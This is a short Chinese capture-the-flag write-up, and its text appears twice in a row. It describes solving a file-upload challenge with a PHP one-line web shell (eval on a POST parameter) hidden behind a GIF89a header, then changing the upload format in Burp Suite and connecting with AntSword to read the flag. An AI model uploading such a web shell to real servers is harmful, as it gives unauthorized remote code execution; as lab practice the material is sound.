启动靶机,打开环境
又是一道Upload题。
根据上一道题的思路来,
先上传一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
上面显示Not image
那我们用bp来抓一下包。
然后修改一下格式
然后这里已经显示了。说明上传成功了,但是它并没有显示明显的路径,那我们猜测应该是存在/upload的路径之下,所以我们用蚁剑连接一下
添加上数据,然后flag就是根目录下。
启动靶机,打开环境
又是一道Upload题。
根据上一道题的思路来,
先上传一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
上面显示Not image
那我们用bp来抓一下包。
然后修改一下格式
然后这里已经显示了。说明上传成功了,但是它并没有显示明显的路径,那我们猜测应该是存在/upload的路径之下,所以我们用蚁剑连接一下
添加上数据,然后flag就是根目录下。